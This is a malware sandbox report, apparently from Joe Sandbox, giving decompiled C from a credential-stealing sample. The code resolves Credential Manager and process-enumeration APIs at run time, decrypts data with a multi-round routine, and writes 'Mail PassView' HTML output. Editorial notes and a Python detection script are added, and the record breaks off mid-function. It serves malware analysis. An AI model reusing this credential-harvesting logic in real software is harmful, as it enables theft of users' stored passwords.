                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                    • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                                                                                    • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                                                                                                    • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                                                                                    • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040E056() {
                                                                                                                                                    				void* _t1;
                                                                                                                                                    				_Unknown_base(*)()* _t2;
                                                                                                                                                    				struct HINSTANCE__* _t4;
                                                                                                                                                    
                                                                                                                                                    				if( *0x417514 != 0) {
                                                                                                                                                    					return _t1;
                                                                                                                                                    				}
                                                                                                                                                    				_t2 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                    				_t4 = _t2;
                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                    					L9:
                                                                                                                                                    					return _t2;
                                                                                                                                                    				}
                                                                                                                                                    				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                                                    				 *0x416fe0 = _t2;
                                                                                                                                                    				if(_t2 != 0) {
                                                                                                                                                    					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                                                    					 *0x416fd8 = _t2;
                                                                                                                                                    					if(_t2 != 0) {
                                                                                                                                                    						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                                                    						 *0x416fd4 = _t2;
                                                                                                                                                    						if(_t2 != 0) {
                                                                                                                                                    							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                                                    							 *0x416e6c = _t2;
                                                                                                                                                    							if(_t2 != 0) {
                                                                                                                                                    								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                                                    								 *0x416fcc = _t2;
                                                                                                                                                    								if(_t2 != 0) {
                                                                                                                                                    									 *0x417514 = 1;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				goto L9;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                    • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                                                                                    • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                                                                                                    • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                                                                                    • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				/* Resolves the Windows Credential Manager API from advapi32.dll at
				   run time instead of importing it, so none of the Cred* names show
				   up in the static import table. __eax points at a small table:
				   [0] module handle, [1] "initialised" flag, [2..6] function
				   pointers. Comments are editorial; the addresses at the right are
				   the report's own line-to-address column, rejoined to the code. */
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;                                                          /* 0x00404648 */
				E004046C2(__eax);                                                      /* 0x0040464a  drops any earlier handle (calls FreeLibrary) */
				_t12 = LoadLibraryA("advapi32.dll");                                   /* 0x00404654 */
				 *_t23 = _t12;                                                         /* 0x0040465c */
				if(_t12 != 0) {                                                        /* 0x0040465e */
					_t23[2] = GetProcAddress(_t12, "CredReadA");                       /* 0x00404676  read one stored credential */
					_t23[3] = GetProcAddress( *_t23, "CredFree");                      /* 0x00404682 */
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");                   /* 0x0040468e  can remove stored credentials */
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");                /* 0x0040469a  list every stored credential */
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");                /* 0x004046a3 */
					if(_t23[2] == 0 || _t23[3] == 0) {                                 /* 0x004046a7  only CredReadA and CredFree are mandatory */
						E004046C2(_t23);                                               /* 0x004046b8 */
					} else {                                                           /* 0x004046af */
						_t23[1] = 1;                                                   /* 0x004046af */
					}                                                                  /* 0x004046af */
				}                                                                      /* 0x004046a7 */
				return _t23[1];                                                        /* 0x004046c1 */
			}

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,7554F420), ref: 004046C9
                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                    • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                                                                                    • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                                                                                                    • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                                                                                    • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
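Neither of the two functions above imports its targets statically: E00404647 loads advapi32.dll and resolves the Cred* family through GetProcAddress, and the function before it does the same for the Toolhelp32 process/module enumeration set out of kernel32.dll. That is exactly why the names survive as plain NUL-terminated strings in the unpacked region at 0x00400000 that this listing was decompiled from. The triage script below is an added example, not Joe Sandbox code and not code recovered from the sample: it scans a dump for those two API clusters and reports whether the resolver primitives (LoadLibraryA/GetModuleHandleA plus GetProcAddress) sit beside them. The API names are the ones in the report's String ID fields; the dump bytes are constructed inline as a stand-in for a real memory dump.

```python
"""Triage a memory dump for API-name clusters that are resolved via GetProcAddress.

Editorial example for this report. The cluster contents come from the report's
String ID fields; SAMPLE_DUMP and BENIGN_DUMP are constructed here and are not
bytes from the analysed sample.
"""
import re
from dataclasses import dataclass

# A complete Toolhelp32 set means process/module enumeration; a complete
# Credential Manager set means the code can enumerate, read and delete
# credentials stored in Windows Credential Manager.
API_CLUSTERS = {
    "toolhelp32_enum": {
        "library": b"kernel32.dll",
        "names": {b"CreateToolhelp32Snapshot", b"Module32First", b"Module32Next",
                  b"Process32First", b"Process32Next"},
    },
    "credman_harvest": {
        "library": b"advapi32.dll",
        "names": {b"CredReadA", b"CredFree", b"CredDeleteA",
                  b"CredEnumerateA", b"CredEnumerateW"},
    },
}

LOADERS = {b"LoadLibraryA", b"GetModuleHandleA"}
RESOLVER = b"GetProcAddress"

_ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")  # printable runs, like strings(1)


def extract_ascii_strings(blob: bytes) -> set[bytes]:
    """Printable ASCII runs of length >= 4, split on NUL so each API name
    (GetProcAddress takes NUL-terminated names) comes out as its own run."""
    found: set[bytes] = set()
    for chunk in blob.split(b"\x00"):
        found.update(_ASCII_RUN.findall(chunk))
    return found


@dataclass
class ClusterHit:
    cluster: str
    library: str
    present: tuple
    missing: tuple
    dynamic_resolution: bool  # library name + loader + GetProcAddress all present

    @property
    def coverage(self) -> float:
        total = len(self.present) + len(self.missing)
        return len(self.present) / total if total else 0.0


def _has(name: bytes, strings: set[bytes]) -> bool:
    # substring match so a name glued to neighbouring printable bytes still counts
    return name in strings or any(name in s for s in strings)


def find_api_clusters(blob: bytes, min_coverage: float = 0.6) -> list:
    """Report every cluster with at least min_coverage of its names in the dump.

    The threshold keeps ordinary software that only calls Process32First/Next
    from being flagged; the full five-name sets are what the decompiled code shows.
    """
    strings = extract_ascii_strings(blob)
    hits = []
    for cluster, spec in API_CLUSTERS.items():
        present = tuple(sorted(n.decode() for n in spec["names"] if _has(n, strings)))
        missing = tuple(sorted(n.decode() for n in spec["names"] if not _has(n, strings)))
        dynamic = (_has(spec["library"], strings) and _has(RESOLVER, strings)
                   and any(_has(l, strings) for l in LOADERS))
        hit = ClusterHit(cluster, spec["library"].decode(), present, missing, dynamic)
        if hit.coverage >= min_coverage:
            hits.append(hit)
    return sorted(hits, key=lambda h: h.cluster)


def summarize(blob: bytes) -> list:
    """One human-readable line per reported cluster."""
    return [f"{h.cluster} via {h.library}: {len(h.present)}/{len(h.present) + len(h.missing)} names"
            + (" (resolved at run time)" if h.dynamic_resolution else "")
            for h in find_api_clusters(blob)]


def _constructed_dump() -> bytes:
    """Constructed stand-in for an unpacked .rdata region; not sample bytes."""
    rdata = b"\x00".join([
        b"kernel32.dll", b"CreateToolhelp32Snapshot", b"Module32First",
        b"Module32Next", b"Process32First", b"Process32Next",
        b"advapi32.dll", b"CredReadA", b"CredFree", b"CredDeleteA",
        b"CredEnumerateA", b"CredEnumerateW",
        b"GetModuleHandleA", b"LoadLibraryA", b"GetProcAddress",
    ]) + b"\x00"
    return b"MZ" + bytes(range(32)) * 4 + rdata + b"\xcc" * 16  # non-printable filler


SAMPLE_DUMP = _constructed_dump()
# Constructed benign-looking region: only two of the five Toolhelp32 names.
BENIGN_DUMP = b"MZ\x00\x00" + b"\x00".join(
    [b"kernel32.dll", b"GetProcAddress", b"CreateToolhelp32Snapshot", b"Process32Next"]) + b"\x00"

if __name__ == "__main__":
    for line in summarize(SAMPLE_DUMP):
        print(line)
```

Against a real dump, `find_api_clusters(open(path, "rb").read())` is enough; the credman_harvest cluster is the strong indicator here, since CredEnumerate followed by CredRead is how stored mail and network credentials get pulled, while the Toolhelp32 set on its own is common in legitimate tooling and should only raise priority when it appears next to the resolver primitives.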

                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
                                                                                                                                                    				void _v8;
                                                                                                                                                    				void _v12;
                                                                                                                                                    				void _v24;
                                                                                                                                                    				char _v39;
                                                                                                                                                    				void _v40;
                                                                                                                                                    				char _v132;
                                                                                                                                                    				void _v1156;
                                                                                                                                                    				void _v1172;
                                                                                                                                                    				char _v1180;
                                                                                                                                                    				void _v1187;
                                                                                                                                                    				char _v1188;
                                                                                                                                                    				void _v2228;
                                                                                                                                                    				void _v2243;
                                                                                                                                                    				void _v2244;
                                                                                                                                                    				void _v3267;
                                                                                                                                                    				char _v3268;
                                                                                                                                                    				void _v4291;
                                                                                                                                                    				char _v4292;
                                                                                                                                                    				char _v5340;
                                                                                                                                                    				void _v5347;
                                                                                                                                                    				char _v5348;
                                                                                                                                                    				char _v6116;
                                                                                                                                                    				char _v7136;
                                                                                                                                                    				void _v7140;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				int _t86;
                                                                                                                                                    				void* _t109;
                                                                                                                                                    				void* _t122;
                                                                                                                                                    				void* _t135;
                                                                                                                                                    				char _t156;
                                                                                                                                                    				signed char _t168;
                                                                                                                                                    				signed int _t171;
                                                                                                                                                    				intOrPtr _t177;
                                                                                                                                                    				signed int _t183;
                                                                                                                                                    				void* _t185;
                                                                                                                                                    
				_t171 = __edx;
				E004118A0(0x1be4, __ecx);                                      /* 0x1be4 equals the deepest local (_v7140): stack probe for the frame below */
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);                                    /* zero a 1 KiB output buffer */
				_a8 = E00410E8A(_a8,  &_v3268);
				_t86 = strlen(_a4);                                            /* _a4 is a C string used as key material */
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");                                          /* inline 9-byte copy (two dwords plus one byte) */
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);                            /* three zeroed 0x41f-byte work buffers */
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");                                          /* zero a 15-byte local (3 dwords, word, byte) */
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						/* E0040BC49 / E0040BC6D / E0040BD0B are called in an init / update(len, ctx, data) /
						   finalize shape three times, each round fed with the previous result (inferred from
						   the call pattern; the algorithm itself is not recovered in this listing). */
						E0040BC49( &_v132);                                    /* round 1: over the _a4 string */
						E0040BC6D(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BD0B( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BC49( &_v132);                                    /* round 2: over 0x18 bytes of round 1 */
						_push( &_v2244);
						_t109 = 0x18;
						E0040BC6D(_t109,  &_v132);
						E0040BD0B( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BC49(_t181);                                      /* round 3: over 0x28 bytes of round 2 */
						_push( &_v1188);
						_t122 = 0x28;
						E0040BC6D(_t122, _t181);
						E0040BD0B( &_v39, _t181,  &_v5348);
						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);        /* state set-up from the derived material (key-schedule shape, inferred) */
						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;             /* cdq / and 7 / add / sar 3: signed _a8 / 8, the count of 8-byte blocks */
						_a4 = 0;
						if(_t183 > 0) {
							do {
								/* one 8-byte block per iteration (_a4 << 3 indexes input and output) */
								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
                                                                                                                                                    								_a4 =  &(_a4[1]);
                                                                                                                                                    							} while (_a4 < _t183);
                                                                                                                                                    							_t177 = _a8;
                                                                                                                                                    						}
                                                                                                                                                    						_t135 = 0;
                                                                                                                                                    						if(_t177 > _t156) {
                                                                                                                                                    							do {
                                                                                                                                                    								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
                                                                                                                                                    								_t135 = _t135 + 1;
                                                                                                                                                    								 *(_t185 + _t135 - 0x1be1) = _t168;
                                                                                                                                                    							} while (_t135 < _t177);
                                                                                                                                                    						}
                                                                                                                                                    						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
                                                                                                                                                    						strcpy(_a12,  &_v7136);
                                                                                                                                                    						E0040BC49( &_v132);
                                                                                                                                                    						_t67 = _t177 - 4; // 0x0
                                                                                                                                                    						E0040BC6D(_t67,  &_v132, _a12);
                                                                                                                                                    						E0040BD0B(_t177,  &_v132,  &_v40);
                                                                                                                                                    						memcpy( &_v8,  &_v40, 4);
                                                                                                                                                    						memcpy( &_v12,  &_v7140, 4);
                                                                                                                                                    						_t156 = 1;
                                                                                                                                                    						 *_a16 = 0 | _v8 == _v12;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return _t156;
                                                                                                                                                    			}

Instruction addresses (the disassembly text they labelled was not captured):
0x00411015 0x0041101d 0x00411025 0x00411034 0x0041103a 0x00411053 0x00411056 0x00411060
0x00411063 0x00411069 0x0041106b 0x00411079 0x0041107a 0x0041107b 0x0041108a 0x00411090
0x0041109e 0x004110a4 0x004110b2 0x004110b8 0x004110bf 0x004110c5 0x004110c6 0x004110c7
0x004110c8 0x004110cf 0x004110d8 0x004110de 0x004110e6 0x004110f4 0x00411100 0x00411103
0x00411115 0x0041111f 0x0041112a 0x0041112d 0x00411130 0x0041113c 0x00411151 0x00411163
0x0041116a 0x00411175 0x00411178 0x0041117b 0x00411187 0x004111a6 0x004111be 0x004111c3
0x004111c8 0x004111d0 0x004111d8 0x004111db 0x004111dd 0x004111f8 0x004111fd 0x00411203
0x00411206 0x00411206 0x00411209 0x0041120d 0x0041120f 0x00411216 0x0041121d 0x00411220
0x00411220 0x0041120f 0x00411233 0x0041123a 0x00411242 0x0041124a 0x00411250 0x0041125c
0x0041126b 0x0041127d 0x00411295 0x00411296 0x00411296 0x0041106b 0x0041129e

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0041103A
                                                                                                                                                      • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                                                                                    • strlen.MSVCRT ref: 00411056
                                                                                                                                                    • memset.MSVCRT ref: 00411090
                                                                                                                                                    • memset.MSVCRT ref: 004110A4
                                                                                                                                                    • memset.MSVCRT ref: 004110B8
                                                                                                                                                    • memset.MSVCRT ref: 004110DE
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                                                                      • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                                                                                    • memcpy.MSVCRT ref: 00411115
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                                                                                    • memcpy.MSVCRT ref: 00411151
                                                                                                                                                    • memcpy.MSVCRT ref: 00411163
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                                                                                                    • memcpy.MSVCRT ref: 0041126B
                                                                                                                                                    • memcpy.MSVCRT ref: 0041127D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset$strlen$strcpy
                                                                                                                                                    • String ID: salu
                                                                                                                                                    • API String ID: 2660478486-4177317985
                                                                                                                                                    • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                                                                                    • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                                                                                                    • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                                                                                    • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                    			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                    				char _v76;
                                                                                                                                                    				void _v1099;
                                                                                                                                                    				char _v1100;
                                                                                                                                                    				void _v2123;
                                                                                                                                                    				char _v2124;
                                                                                                                                                    				void _v3147;
                                                                                                                                                    				char _v3148;
                                                                                                                                                    				char _v4172;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t36;
                                                                                                                                                    				void* _t37;
                                                                                                                                                    				void* _t48;
                                                                                                                                                    				void* _t55;
                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                    				signed int _t58;
                                                                                                                                                    				intOrPtr* _t63;
                                                                                                                                                    				void* _t70;
                                                                                                                                                    				void* _t71;
                                                                                                                                                    
                                                                                                                                                    				_t56 = __ecx;
                                                                                                                                                    				E004118A0(0x1048, __ecx);
                                                                                                                                                    				_t63 = _t56;
                                                                                                                                                    				_v8 = _t63;
                                                                                                                                                    				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                                                    				_v1100 = 0;
                                                                                                                                                    				memset( &_v1099, 0, 0x3ff);
                                                                                                                                                    				_v3148 = 0;
                                                                                                                                                    				memset( &_v3147, 0, 0x3ff);
                                                                                                                                                    				_v2124 = 0;
                                                                                                                                                    				memset( &_v2123, 0, 0x3ff);
                                                                                                                                                    				_t71 = _t70 + 0x2c;
                                                                                                                                                    				if( *0x417308 != 0) {
                                                                                                                                                    					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
                                                                                                                                                    					_t71 = _t71 + 0xc;
                                                                                                                                                    				}
                                                                                                                                                    				if( *0x417304 != 0) {
                                                                                                                                                    					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                                                    				}
                                                                                                                                                    				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                                                                                                                                    				_t58 = 0x10;
                                                                                                                                                    				_push(_t36);
                                                                                                                                                    				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
                                                                                                                                                    				asm("movsb");
                                                                                                                                                    				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
                                                                                                                                                    				E00405EFD(_a4,  &_v4172);
                                                                                                                                                    				_push("Mail PassView");
                                                                                                                                                    				_t55 = 6;
                                                                                                                                                    				_push(E004078FF(_t55));
                                                                                                                                                    				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                                                    				_t48 = E00405EFD(_a4,  &_v2124);
                                                                                                                                                    				_t78 = _a8 - 4;
                                                                                                                                                    				if(_a8 == 4) {
                                                                                                                                                    					return E004097E6(_v8, _t78, _a4);
                                                                                                                                                    				}
                                                                                                                                                    				return _t48;
                                                                                                                                                    			}

                                                                                                                                                    0x00403e87
                                                                                                                                                    0x00403e8f
                                                                                                                                                    0x00403e9f
                                                                                                                                                    0x00403ea1
                                                                                                                                                    0x00403ea4
                                                                                                                                                    0x00403eb9
                                                                                                                                                    0x00403ebf
                                                                                                                                                    0x00403ecd
                                                                                                                                                    0x00403ed3
                                                                                                                                                    0x00403ee1
                                                                                                                                                    0x00403ee7
                                                                                                                                                    0x00403eec
                                                                                                                                                    0x00403ef5
                                                                                                                                                    0x00403f08
                                                                                                                                                    0x00403f0d
                                                                                                                                                    0x00403f0d
                                                                                                                                                    0x00403f16
                                                                                                                                                    0x00403f24
                                                                                                                                                    0x00403f2a
                                                                                                                                                    0x00403f2f
                                                                                                                                                    0x00403f34
                                                                                                                                                    0x00403f35
                                                                                                                                                    0x00403f3e
                                                                                                                                                    0x00403f5a
                                                                                                                                                    0x00403f5b
                                                                                                                                                    0x00403f6a
                                                                                                                                                    0x00403f72
                                                                                                                                                    0x00403f79
                                                                                                                                                    0x00403f7f
                                                                                                                                                    0x00403f8c
                                                                                                                                                    0x00403f9b
                                                                                                                                                    0x00403fa3
                                                                                                                                                    0x00403fa7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403faf
                                                                                                                                                    0x00403fb8

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    • memset.MSVCRT ref: 00403EBF
                                                                                                                                                    • memset.MSVCRT ref: 00403ED3
                                                                                                                                                    • memset.MSVCRT ref: 00403EE7
                                                                                                                                                    • sprintf.MSVCRT ref: 00403F08
                                                                                                                                                    • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                                                                                                    • sprintf.MSVCRT ref: 00403F5B
                                                                                                                                                    • sprintf.MSVCRT ref: 00403F8C
                                                                                                                                                    Strings
                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                                                                                                    • Mail PassView, xrefs: 00403F72
                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                                                                                                    • API String ID: 1043021993-495024357
                                                                                                                                                    • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                                                                                    • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                                                                                                    • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                                                                                    • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				char _v280;
                                                                                                                                                    				char _v408;
                                                                                                                                                    				intOrPtr _v412;
                                                                                                                                                    				char _v796;
                                                                                                                                                    				intOrPtr _v800;
                                                                                                                                                    				char _v928;
                                                                                                                                                    				char _v940;
                                                                                                                                                    				wchar_t* _t23;
                                                                                                                                                    				char* _t41;
                                                                                                                                                    				wchar_t** _t59;
                                                                                                                                                    				void* _t76;
                                                                                                                                                    
                                                                                                                                                    				_t76 = __fp0;
                                                                                                                                                    				_t59 = _a4;
